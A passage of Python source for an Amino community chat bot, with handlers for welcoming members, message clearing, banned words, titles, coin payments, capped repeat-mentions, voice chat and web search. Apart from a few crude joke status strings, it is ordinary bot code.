message=message)\n\n\tdef get_chat_id(self, chat: str = None):\n\t\twith suppress(Exception):\n\t\t\treturn self.subclient.get_from_code(\n\t\t\t f\"http://aminoapps.com/c/{chat}\").objectId\n\n\t\tval = self.subclient.get_public_chat_threads(size=50)\n\t\tfor title, chat_id in zip(val.title, val.chatId):\n\t\t\tif chat == title:\n\t\t\t\treturn chat_id\n\t\tfor title, chat_id in zip(val.title, val.chatId):\n\t\t\tif chat.lower() in title.lower() or chat == chat_id:\n\t\t\t\treturn chat_id\n\t\treturn False\n\n\tdef stop_instance(self):\n\t\tself.marche = False\n\n\tdef 
leave_community(self):\n\t\tself.client.leave_community(comId=self.community_id)\n\t\tself.marche = False\n\t\tfor elem in self.subclient.get_public_chat_threads().chatId:\n\t\t\twith suppress(Exception):\n\t\t\t\tself.subclient.leave_chat(elem)\n\n\tdef check_new_member(self):\n\t\tif not (self.message_bvn and self.welcome_chat):\n\t\t\treturn\n\t\tnew_list = self.subclient.get_all_users(start=0,\n\t\t size=25,\n\t\t type=\"recent\")\n\t\tnew_member = [(elem[\"nickname\"], elem[\"uid\"])\n\t\t for elem in new_list.json[\"userProfileList\"]]\n\t\tfor elem in new_member:\n\t\t\tname, uid = elem[0], elem[1]\n\t\t\ttry:\n\t\t\t\tval = self.subclient.get_wall_comments(\n\t\t\t\t userId=uid, sorting='newest').commentId\n\t\t\texcept Exception:\n\t\t\t\tval = True\n\n\t\t\tif not val and self.message_bvn:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tself.subclient.comment(message=self.message_bvn,\n\t\t\t\t\t userId=uid)\n\t\t\tif not val and self.welcome_chat:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tself.send_message(chatId=self.welcome_chat,\n\t\t\t\t\t message=f\"Welcome here ‎‏‎‏@{name}!‬‭\",\n\t\t\t\t\t mentionUserIds=[uid])\n\n\t\tnew_users = self.subclient.get_all_users(start=0,\n\t\t size=30,\n\t\t type=\"recent\")\n\t\tself.new_users = [\n\t\t elem[\"uid\"] for elem in new_users.json[\"userProfileList\"]\n\t\t]\n\n\tdef welcome_new_member(self):\n\t\tnew_list = self.subclient.get_all_users(start=0,\n\t\t size=25,\n\t\t type=\"recent\")\n\t\tnew_member = [(elem[\"nickname\"], elem[\"uid\"])\n\t\t for elem in new_list.json[\"userProfileList\"]]\n\n\t\tfor elem in new_member:\n\t\t\tname, uid = elem[0], elem[1]\n\n\t\t\ttry:\n\t\t\t\tval = self.subclient.get_wall_comments(\n\t\t\t\t userId=uid, sorting='newest').commentId\n\t\t\texcept Exception:\n\t\t\t\tval = True\n\n\t\t\tif not val and uid not in self.new_users and self.message_bvn:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tself.subclient.comment(message=self.message_bvn,\n\t\t\t\t\t 
userId=uid)\n\n\t\t\tif uid not in self.new_users and self.welcome_chat:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tself.send_message(chatId=self.welcome_chat,\n\t\t\t\t\t message=f\"Welcome here ‎‏‎‏@{name}!‬‭\",\n\t\t\t\t\t mentionUserIds=[uid])\n\n\t\tnew_users = self.subclient.get_all_users(start=0,\n\t\t size=30,\n\t\t type=\"recent\")\n\t\tself.new_users = [\n\t\t elem[\"uid\"] for elem in new_users.json[\"userProfileList\"]\n\t\t]\n\n\tdef feature_chats(self):\n\t\tfor elem in self.favorite_chats:\n\t\t\twith suppress(Exception):\n\t\t\t\tself.favorite(time=2, userId=elem)\n\n\tdef feature_users(self):\n\t\tfeatured = [\n\t\t elem[\"uid\"] for elem in\n\t\t self.subclient.get_featured_users().json[\"userProfileList\"]\n\t\t]\n\t\tfor elem in self.favorite_users:\n\t\t\tif elem not in featured:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tself.favorite(time=1, userId=elem)\n\n\tdef get_member_level(self, uid):\n\t\treturn self.subclient.get_user_info(userId=uid).level\n\n\tdef is_level_good(self, uid):\n\t\treturn self.subclient.get_user_info(userId=uid).level >= self.level\n\n\tdef get_member_titles(self, uid):\n\t\twith suppress(Exception):\n\t\t\treturn self.subclient.get_user_info(userId=uid).customTitles\n\t\treturn False\n\n\tdef get_member_info(self, uid):\n\t\treturn self.subclient.get_user_info(userId=uid)\n\n\tdef get_message_info(self, chatId=None, messageId=None):\n\t\treturn self.subclient.get_message_info(chatId=chatId,\n\t\t messageId=messageId)\n\n\tdef get_wallet_info(self):\n\t\treturn self.client.get_wallet_info().json\n\n\tdef ban(self, userId: str, reason: str, banType: int = None):\n\t\tself.subclient.ban(userId, reason, banType)\n\n\tdef get_wallet_amount(self):\n\t\treturn self.client.get_wallet_info().totalCoins\n\n\tdef pay(self,\n\t coins: int = 0,\n\t blogId: str = None,\n\t chatId: str = None,\n\t objectId: str = None,\n\t transactionId: str = None):\n\t\tif not transactionId:\n\t\t\ttransactionId = f\"{''.join(sample([lst for 
lst in hexdigits[:-6]], 8))}-{''.join(sample([lst for lst in hexdigits[:-6]], 4))}-{''.join(sample([lst for lst in hexdigits[:-6]], 4))}-{''.join(sample([lst for lst in hexdigits[:-6]], 4))}-{''.join(sample([lst for lst in hexdigits[:-6]], 12))}\"\n\t\tself.subclient.send_coins(coins=coins,\n\t\t blogId=blogId,\n\t\t chatId=chatId,\n\t\t objectId=objectId,\n\t\t transactionId=transactionId)\n\n\tdef edit_chat(self,\n\t chatId: str,\n\t doNotDisturb: bool = None,\n\t pinChat: bool = None,\n\t title: str = None,\n\t icon: str = None,\n\t backgroundImage: str = None,\n\t content: str = None,\n\t announcement: str = None,\n\t coHosts: list = None,\n\t keywords: list = None,\n\t pinAnnouncement: bool = None,\n\t publishToGlobal: bool = None,\n\t canTip: bool = None,\n\t viewOnly: bool = None,\n\t canInvite: bool = None,\n\t fansOnly: bool = None):\n\t\tself.subclient.edit_chat(chatId, doNotDisturb, pinChat, title, icon,\n\t\t backgroundImage, content, announcement,\n\t\t coHosts, keywords, pinAnnouncement,\n\t\t publishToGlobal, canTip, viewOnly, canInvite,\n\t\t fansOnly)\n\n\tdef get_message_level(self, level: int):\n\t\treturn f\"You need the level {level} to do this command\"\n\n\tdef delete_message(self,\n\t chatId: str,\n\t messageId: str,\n\t reason: str = \"Clear\",\n\t asStaff: bool = False):\n\t\tself.subclient.delete_message(chatId, messageId, asStaff, reason)\n\n\tdef kick(self, userId: str, chatId: str, allowRejoin: bool = True):\n\t\tself.subclient.kick(userId, chatId, allowRejoin)\n\n\tdef edit_profile(self,\n\t nickname: str = None,\n\t content: str = None,\n\t icon: str = None,\n\t chatRequestPrivilege: str = None,\n\t mediaList: list = None,\n\t backgroundImage: str = None,\n\t backgroundColor: str = None,\n\t titles: list = None,\n\t defaultBubbleId: str = None):\n\t\tself.subclient.edit_profile(nickname, content, icon,\n\t\t chatRequestPrivilege, mediaList,\n\t\t backgroundImage, backgroundColor, titles,\n\t\t defaultBubbleId)\n\n\tdef 
send_message(self,\n\t chatId: str = None,\n\t message: str = \"None\",\n\t messageType: str = None,\n\t file: str = None,\n\t fileType: str = None,\n\t replyTo: str = None,\n\t mentionUserIds: str = None):\n\t\tself.subclient.send_message(chatId=chatId,\n\t\t message=message,\n\t\t file=file,\n\t\t fileType=fileType,\n\t\t replyTo=replyTo,\n\t\t messageType=messageType,\n\t\t mentionUserIds=mentionUserIds)\n\n\tdef favorite(self,\n\t time: int = 1,\n\t userId: str = None,\n\t chatId: str = None,\n\t blogId: str = None,\n\t wikiId: str = None):\n\t\tself.subclient.feature(time=time,\n\t\t userId=userId,\n\t\t chatId=chatId,\n\t\t blogId=blogId,\n\t\t wikiId=wikiId)\n\n\tdef unfavorite(self,\n\t userId: str = None,\n\t chatId: str = None,\n\t blogId: str = None,\n\t wikiId: str = None):\n\t\tself.subclient.unfeature(userId=userId,\n\t\t chatId=chatId,\n\t\t blogId=blogId,\n\t\t wikiId=wikiId)\n\n\tdef join_chat(self, chat: str, chatId: str = None):\n\t\tchat = chat.replace(\"http:aminoapps.com/p/\", \"\")\n\t\tif not chat:\n\t\t\twith suppress(Exception):\n\t\t\t\tself.subclient.join_chat(chatId)\n\t\t\t\treturn \"\"\n\n\t\t\twith suppress(Exception):\n\t\t\t\tchati = self.subclient.get_from_code(\n\t\t\t\t f\"http://aminoapps.com/c/{chat}\").objectId\n\t\t\t\tself.subclient.join_chat(chati)\n\t\t\t\treturn chat\n\n\t\tchats = self.subclient.get_public_chat_threads()\n\t\tfor title, chat_id in zip(chats.title, chats.chatId):\n\t\t\tif chat == title:\n\t\t\t\tself.subclient.join_chat(chat_id)\n\t\t\t\treturn title\n\n\t\tchats = self.subclient.get_public_chat_threads()\n\t\tfor title, chat_id in zip(chats.title, chats.chatId):\n\t\t\tif chat.lower() in title.lower() or chat == chat_id:\n\t\t\t\tself.subclient.join_chat(chat_id)\n\t\t\t\treturn title\n\n\t\treturn False\n\n\tdef get_chats(self):\n\t\treturn self.subclient.get_public_chat_threads()\n\n\tdef join_all_chat(self):\n\t\tfor elem in self.subclient.get_public_chat_threads(size=50).chatId:\n\t\t\twith 
suppress(Exception):\n\t\t\t\tself.subclient.join_chat(elem)\n\n\tdef leave_chat(self, chat: str):\n\t\tself.subclient.leave_chat(chat)\n\n\tdef leave_all_chats(self):\n\t\tfor elem in self.subclient.get_public_chat_threads(size=100).chatId:\n\t\t\twith suppress(Exception):\n\t\t\t\tself.subclient.leave_chat(elem)\n\n\tdef follow_user(self, uid):\n\t\tself.subclient.follow(userId=[uid])\n\n\tdef unfollow_user(self, uid):\n\t\tself.subclient.unfollow(userId=uid)\n\n\tdef add_title(self, uid, title: str, color: str = None):\n\t\tmember = self.get_member_titles(uid)\n\t\ttlist = []\n\t\tclist = []\n\t\twith suppress(Exception):\n\t\t\ttlist = [elem['title'] for elem in member]\n\t\t\tclist = [elem['color'] for elem in member]\n\t\ttlist.append(title)\n\t\tclist.append(color)\n\n\t\twith suppress(Exception):\n\t\t\tself.subclient.edit_titles(uid, tlist, clist)\n\t\treturn True\n\n\tdef remove_title(self, uid, title: str):\n\t\tmember = self.get_member_titles(uid)\n\t\ttlist = []\n\t\tclist = []\n\t\tfor elem in member:\n\t\t\ttlist.append(elem[\"title\"])\n\t\t\tclist.append(elem[\"color\"])\n\n\t\tif title in tlist:\n\t\t\tnb = tlist.index(title)\n\t\t\ttlist.pop(nb)\n\t\t\tclist.pop(nb)\n\t\t\tself.subclient.edit_titles(uid, tlist, clist)\n\t\treturn True\n\n\tdef passive(self):\n\t\ti = 30\n\t\tj = 470\n\t\tk = 7170\n\t\tm = 86370\n\t\to = 0\n\t\tactivities = [\n\t\t f\"{self.prefix}𝑼 𝒔𝒐𝒖𝒏𝒅𝒔 𝒃𝒆𝒕𝒕𝒆𝒓 𝒘𝒊𝒕𝒉 𝒚𝒐𝒖𝒓 𝒎𝒐𝒖𝒕𝒉 𝒄𝒍𝒐𝒔𝒆𝒅\",\n\t\t \"𝑼 𝒔𝒐𝒖𝒏𝒅𝒔 𝒃𝒆𝒕𝒕𝒆𝒓 𝒘𝒊𝒕𝒉 𝒚𝒐𝒖𝒓 𝒎𝒐𝒖𝒕𝒉 𝒄𝒍𝒐𝒔𝒆𝒅\",\n\t\t f\"{self.prefix}𝑩𝒐𝒐𝒃𝒔 𝒂𝒓𝒆 𝒕𝒉𝒆 𝒑𝒓𝒐𝒐𝒇 𝒕𝒉𝒂𝒕 𝒎𝒂𝒏 𝒄𝒂𝒏 𝒇𝒐𝒄𝒖𝒔 𝒐𝒏 𝒕𝒘𝒐 𝒕𝒉𝒊𝒏𝒈𝒔 𝒂𝒕 𝒐𝒏𝒄𝒆\"\n\t\t]\n\t\twhile self.marche:\n\t\t\tif i >= 60:\n\t\t\t\tif self.welcome_chat or self.message_bvn:\n\t\t\t\t\tThread(target=self.welcome_new_member).start()\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tself.subclient.activity_status('on')\n\t\t\t\ti = 0\n\t\t\t\to += 1\n\t\t\t\tif o > len(activities) - 1:\n\t\t\t\t\to = 0\n\t\t\tif j >= 500:\n\t\t\t\tif self.welcome_chat or self.message_bvn:\n\t\t\t\t\twith 
suppress(Exception):\n\t\t\t\t\t\tThread(target=self.check_new_member).start()\n\t\t\t\tj = 0\n\n\t\t\tif k >= 7200 and self.favorite_chats:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tThread(target=self.feature_chats).start()\n\t\t\t\tk = 0\n\n\t\t\tif m >= 86400 and self.favorite_users:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tThread(target=self.feature_users).start()\n\t\t\t\tm = 0\n\n\t\t\tk += 10\n\t\t\tm += 10\n\t\t\tj += 10\n\t\t\ti += 10\n\n\t\t\tsleep(10)\n\n\tdef run(self):\n\t\tThread(target=self.passive).start()\n\n\ndef is_it_bot(uid):\n\treturn uid == botId\n\n\ndef is_it_me(uid):\n\treturn uid in ('d656e556-57ba-4f69-8c1c-07848e7800d8',\n\t 'e123f164-2e43-4ec7-96ee-36c121977f9e')\n\n\ndef is_it_admin(uid):\n\treturn uid in perms_list\n\n\ndef join_community(comId: str = None, inv: str = None):\n\twith suppress(Exception):\n\t\tclient.join_community(comId=comId, invitationId=inv)\n\t\treturn 1\n\n\tif inv:\n\t\twith suppress(Exception):\n\t\t\tclient.request_join_community(comId=comId,\n\t\t\t message='ass for everyone!!')\n\t\t\treturn 2\n\n\ndef join_amino(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tinvit = None\n\tif taille_commu >= 20 and not (is_it_me(authorId)\n\t or is_it_admin(authorId)):\n\t\tsubClient.send_message(chatId,\n\t\t \"The bot has joined too many communities!\")\n\t\treturn\n\n\tstaff = subClient.get_staff(message)\n\tif not staff:\n\t\tsubClient.send_message(chatId, \"Wrong amino ID!\")\n\t\treturn\n\n\ttry:\n\t\ttest = message.strip().split()\n\t\tamino_c = test[0]\n\t\tinvit = test[1]\n\t\tinvit = invit.replace(\"http://aminoapps.com/invite/\", \"\")\n\texcept Exception:\n\t\tamino_c = message\n\t\tinvit = None\n\n\ttry:\n\t\tval = subClient.client.get_from_code(\n\t\t f\"http://aminoapps.com/c/{amino_c}\")\n\t\tcomId = val.json[\"extensions\"][\"community\"][\"ndcId\"]\n\texcept Exception:\n\t\tval = \"\"\n\n\tisJoined = 
val.json[\"extensions\"][\"isCurrentUserJoined\"]\n\tif not isJoined:\n\t\tjoin_community(comId, invit)\n\t\tval = client.get_from_code(f\"http://aminoapps.com/c/{amino_c}\")\n\t\tisJoined = val.json[\"extensions\"][\"isCurrentUserJoined\"]\n\t\tif isJoined:\n\t\t\tcommunaute[comId] = BotAmino(client=client, community=message)\n\t\t\tcommunaute[comId].run()\n\t\t\tsubClient.send_message(chatId, \"Joined!\")\n\t\t\treturn\n\t\tsubClient.send_message(chatId, \"Waiting for join!\")\n\t\treturn\n\telse:\n\t\tsubClient.send_message(chatId, \"Allready joined!\")\n\t\treturn\n\n\tsubClient.send_message(chatId, \"Waiting for join!\")\n\n\ndef title(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(botId):\n\t\tcolor = None\n\t\ttry:\n\t\t\telem = message.strip().split(\"color=\")\n\t\t\tmessage, color = elem[0], elem[1].strip()\n\t\t\tif not color.startswith(\"#\"):\n\t\t\t\tcolor = \"#\" + color\n\t\t\tval = subClient.add_title(authorId, message, color)\n\t\texcept Exception:\n\t\t\tval = subClient.add_title(authorId, message)\n\n\t\tif val:\n\t\t\tsubClient.send_message(chatId,\n\t\t\t f\"The titles of {author} has changed\")\n\t\telse:\n\t\t\tsubClient.send_mesubClient.send_message(\n\t\t\t chatId, subClient.get_message_level(subClient.lvl_min))\n\n\ndef cus_k(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsubClient.send_message(chatId, f\"Here is a {message} for {author} \")\n\n\ndef hh(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsubClient.subclient.accept_organizer(chatId)\n\tsubClient.send_message(chatId, \"accepted\")\n\n\ndef dice(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif not message:\n\t\tsubClient.send_message(chatId, f\"🎲 -{randint(1, 20)},(1-20)- 🎲\")\n\t\treturn\n\n\twith suppress(Exception):\n\t\tpt = 
message.split('d')\n\t\tval = ''\n\t\tcpt = 0\n\t\tif int(pt[0]) > 20:\n\t\t\tpt[0] = 20\n\t\tif int(pt[1]) > 1000000:\n\t\t\tpt[1] = 1000000\n\t\tfor _ in range(int(pt[0])):\n\t\t\tppt = randint(1, int(pt[1]))\n\t\t\tcpt += ppt\n\t\t\tval += str(ppt) + \" \"\n\t\tprint(f'🎲 -{cpt},[ {val}](1-{pt[1]})- 🎲')\n\t\tsubClient.send_message(chatId, f'🎲 -{cpt},[ {val}](1-{pt[1]})- 🎲')\n\n\ndef join(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tval = subClient.join_chat(message, chatId)\n\tif val or val == \"\":\n\t\tsubClient.send_message(chatId, f\"Chat {val} joined\".strip())\n\telse:\n\t\tsubClient.send_message(chatId, \"No chat joined\")\n\n\ndef join_all(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tsubClient.join_all_chat()\n\t\tsubClient.send_message(chatId, \"All chat joined\")\n\n\ndef leave_all(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tsubClient.send_message(chatId, \"Leaving all chat...\")\n\t\tsubClient.leave_all_chats()\n\n\ndef leave(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif message and (is_it_me(authorId) or is_it_admin(authorId)):\n\t\tchat_ide = subClient.get_chat_id(message)\n\t\tif chat_ide:\n\t\t\tchatId = chat_ide\n\tsubClient.leave_chat(chatId)\n\n\ndef clear(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif (subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t or is_it_admin(authorId)) and subClient.is_in_staff(botId):\n\t\tsize = 1\n\t\tmsg = \"\"\n\t\tval = \"\"\n\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\tif \"chat=\" in message and (is_it_me(authorId)\n\t\t 
or is_it_admin(authorId)):\n\t\t\tchat_name = message.rsplit(\"chat=\", 1).pop()\n\t\t\tchat_ide = subClient.get_chat_id(chat_name)\n\t\t\tif chat_ide:\n\t\t\t\tchatId = chat_ide\n\t\t\tmessage = \" \".join(message.strip().split()[:-1])\n\n\t\twith suppress(Exception):\n\t\t\tsize = int(message.strip().split(' ').pop())\n\t\t\tmsg = ' '.join(message.strip().split(' ')[:-1])\n\n\t\tif size > 50 and not is_it_me(authorId):\n\t\t\tsize = 50\n\n\t\tif msg:\n\t\t\ttry:\n\t\t\t\tval = subClient.get_user_id(msg)\n\t\t\texcept Exception:\n\t\t\t\tval = \"\"\n\n\t\tmessages = subClient.subclient.get_chat_messages(chatId=chatId,\n\t\t size=size)\n\n\t\tfor message, authorId in zip(messages.messageId,\n\t\t messages.author.userId):\n\t\t\tif not val:\n\t\t\t\tsubClient.delete_message(chatId, message, asStaff=True)\n\t\t\telif authorId == val[1]:\n\t\t\t\tsubClient.delete_message(chatId, message, asStaff=True)\n\n\ndef spam(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\ttry:\n\t\tsize = int(message.strip().split().pop())\n\t\tmsg = \" \".join(message.strip().split()[:-1])\n\texcept ValueError:\n\t\tsize = 1\n\t\tmsg = message\n\n\tif size > 3:\n\t\tsize = 3\n\n\tfor _ in range(size):\n\t\twith suppress(Exception):\n\t\t\tsubClient.send_message(chatId, msg)\n\n\ndef mention(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif \"chat=\" in message and (is_it_me(authorId) or is_it_admin(authorId)):\n\t\tchat_name = message.rsplit(\"chat=\", 1).pop()\n\t\tchat_ide = subClient.get_chat_id(chat_name)\n\t\tif chat_ide:\n\t\t\tchatId = chat_ide\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\ttry:\n\t\tsize = int(message.strip().split().pop())\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\texcept ValueError:\n\t\tsize = 1\n\n\tval = subClient.get_user_id(message)\n\tif not val:\n\t\tsubClient.send_message(chatId=chatId, message=\"Username not 
found\")\n\t\treturn\n\n\tif size > 5 and not (is_it_me(authorId) or is_it_admin(authorId)):\n\t\tsize = 5\n\n\tif val:\n\t\tfor _ in range(size):\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.send_message(chatId=chatId,\n\t\t\t\t message=f\"‎‏‎‏@{val[0]}‬‭\",\n\t\t\t\t mentionUserIds=[val[1]])\n\n\ndef mentionall(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tif message and is_it_me(authorId):\n\t\t\tchat_ide = subClient.get_chat_id(message)\n\t\t\tif chat_ide:\n\t\t\t\tchatId = chat_ide\n\t\t\tmessage = \" \".join(message.strip().split()[:-1])\n\n\t\tmention = [\n\t\t userId for userId in subClient.subclient.get_chat_users(\n\t\t chatId=chatId).userId\n\t\t]\n\t\ttest = \"\".join([\n\t\t \"‎‏‎‏‬‭\" for user in subClient.subclient.get_chat_users(\n\t\t chatId=chatId).userId\n\t\t])\n\n\t\twith suppress(Exception):\n\t\t\tsubClient.send_message(chatId=chatId,\n\t\t\t message=f\"@everyone{test}\",\n\t\t\t mentionUserIds=mention)\n\n\ndef join_vc(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tclient.join_voice_chat2(chatId=chatId, comId=subClient.community_id)\n\n\ndef msg(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tvalue = 0\n\tsize = 1\n\tment = None\n\twith suppress(Exception):\n\t\ttry:\n\t\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\texcept:\n\t\t\tsubClient.delete_message(chatId, messageId)\n\n\tif \"chat=\" in message and (is_it_me(authorId) or is_it_admin(authorId)):\n\t\tchat_name = message.rsplit(\"chat=\", 1).pop()\n\t\tchat_ide = subClient.get_chat_id(chat_name)\n\t\tif chat_ide:\n\t\t\tchatId = chat_ide\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\n\ttry:\n\t\tsize = int(message.split().pop())\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\texcept 
ValueError:\n\t\tsize = 0\n\n\ttry:\n\t\tvalue = int(message.split().pop())\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\texcept ValueError:\n\t\tvalue = size\n\t\tsize = 1\n\n\tif not message and value == 1:\n\t\tmessage = f\"‎‏‎‏@{author}‬‭\"\n\t\tment = authorId\n\n\tif size > 3:\n\t\tsize = 3\n\n\tfor _ in range(size):\n\t\twith suppress(Exception):\n\t\t\tsubClient.send_message(chatId=chatId,\n\t\t\t message=f\"{message}\",\n\t\t\t messageType=value,\n\t\t\t mentionUserIds=ment)\n\n\ndef add_banned_word(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tif not message or message in subClient.banned_words:\n\t\t\treturn\n\t\ttry:\n\t\t\tmessage = message.lower().strip().split()\n\t\texcept Exception:\n\t\t\tmessage = [message.lower().strip()]\n\t\tsubClient.add_banned_words(message)\n\t\tsubClient.send_message(chatId, \"Banned word list updated\")\n\n\ndef remove_banned_word(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tif not message:\n\t\t\treturn\n\t\ttry:\n\t\t\tmessage = message.lower().strip().split()\n\t\texcept Exception:\n\t\t\tmessage = [message.lower().strip()]\n\t\tsubClient.remove_banned_words(message)\n\t\tsubClient.send_message(chatId, \"Banned word list updated\")\n\n\ndef start_vc(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsleep(1)\n\tclient.start_vc(chatId=chatId, comId=subClient.community_id, role=message)\n\n\ndef end_vc(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tclient.end_vc(chatId=chatId, comId=subClient.community_id)\n\n\ndef banned_word_list(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n 
messageId=None):\n\tval = \"\"\n\tif subClient.banned_words:\n\t\tfor elem in subClient.banned_words:\n\t\t\tval += elem + \"\\n\"\n\telse:\n\t\tval = \"No words in the list\"\n\tsubClient.send_message(chatId, val)\n\n\ndef sw(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tsubClient.set_welcome_message(message)\n\t\tsubClient.send_message(chatId, \"Welcome message changed\")\n\n\ndef get_chats(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tval = subClient.get_chats()\n\tfor title, _ in zip(val.title, val.chatId):\n\t\tsubClient.send_message(chatId, title)\n\n\ndef chat_id(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tval = subClient.get_chats()\n\t\tfor title, chat_id in zip(val.title, val.chatId):\n\t\t\tif message.lower() in title.lower():\n\t\t\t\tsubClient.send_message(chatId, f\"{title} | {chat_id}\")\n\n\ndef leave_amino(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tsubClient.send_message(chatId, \"Leaving the amino!\")\n\t\tsubClient.leave_community()\n\tdel communaute[subClient.community_id]\n\n\ndef src(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tvalue = 0\n\tsize = 1\n\tment = None\n\twith suppress(Exception):\n\t\ttry:\n\t\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\texcept:\n\t\t\tsubClient.delete_message(chatId, messageId)\n\n\ttry:\n\t\tsize = int(message.split().pop())\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\texcept ValueError:\n\t\tsize = 0\n\n\ttry:\n\t\tvalue = int(message.split().pop())\n\t\tmessage = \" 
\".join(message.strip().split()[:-1])\n\texcept ValueError:\n\t\tvalue = size\n\t\tsize = 1\n\n\tif not message and value == 1:\n\t\tmessage = f\"‎‏‎‏@{author}‬‭\"\n\t\tment = authorId\n\n\tif size > 10 and not (is_it_me(authorId) or is_it_admin(authorId)):\n\t\tsize = 10\n\n\tsearch_word = message\n\tresponse = duckduckpy.query(message, container='dict')\n\tanswer = response['abstract_text']\n\tif len(answer) < 5:\n\t\tanswer = \"Refer Below Link\"\n\tanswer_url = response['abstract_url']\n\tif len(answer_url):\n\t\treply = \"-----------------------------------------------------------------\\n[BC]Search Result\\n-----------------------------------------------------------------\\nWord: \" + str(\n\t\t search_word\n\t\t) + \"\\nResult: \" + str(answer) + \"\\nSoucre URL: \" + str(\n\t\t answer_url\n\t\t) + \"\\n-----------------------------------------------------------------\"\n\tif len(answer_url) == 0:\n\t\treply = \"[C] No Result Found\"\n\tprint(\"reply\", reply)\n\tfor _ in range(size):\n\t\twith suppress(Exception):\n\t\t\tsubClient.send_message(chatId=chatId,\n\t\t\t message=f\"{reply}\",\n\t\t\t messageType=value,\n\t\t\t mentionUserIds=ment)\n\n\ndef img_search(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsearch_phrase = message\n\twith suppress(Exception):\n\t\ttry:\n\t\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\texcept:\n\t\t\tsubClient.delete_message(chatId, messageId)\n\tpath = \"https://www.google.co.in/search?q={0}&source=lnms&tbm=isch\"\n\tpath1 = path.format(search_phrase)\n\trequete = requests.get(path1)\n\tpage = requete.content\n\tsoup = bs4.BeautifulSoup(page, \"html.parser\")\n\t# print(\"\\n\\n\",soup.find_all(\"img\"),\"\\n\\n\")\n\tpropriete = soup.find_all(\"img\")[1]\n\t# Ketan Edit 1.23\n\tpropriete = str(propriete).split(\"src=\")[1][:-2]\n\tprint(\"propriete\", propriete)\n\timage = propriete + \".jpg\"\n\timage = (image.replace('\"', ''))\n\tif image is not 
